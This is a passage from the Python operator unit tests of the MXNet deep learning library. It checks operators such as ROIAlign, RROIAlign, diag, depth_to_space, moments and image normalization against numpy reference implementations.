'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
